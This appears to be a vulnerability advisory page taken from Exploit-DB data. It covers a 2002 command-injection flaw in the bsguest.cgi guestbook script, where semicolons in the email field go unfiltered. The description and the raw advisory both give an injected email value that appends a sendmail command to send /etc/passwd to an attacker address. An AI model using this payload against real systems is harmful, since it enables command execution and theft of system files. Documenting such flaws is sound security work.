Input Validation Vulnerability in Brian Stanback's bsguest.cgi

vendor:

bsguest.cgi

by:

Brian Stanback

7.5

CVSS

HIGH

Input Validation Vulnerability

CWE

Product Name: bsguest.cgi

Affected Version From: bsguest.cgi

Affected Version To: bsguest.cgi

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Input Validation Vulnerability in Brian Stanback’s bsguest.cgi

The script fails to properly filter ';' characters from the user-supplied email address collected by the script. As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server. An attacker can enter their email address as <whitehatjoe@hotmail.com> and 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd', which will cause the server to mail a confirmation letter along with the passwd file to the attacker.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <whitehatjoe@hotmail.com>

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.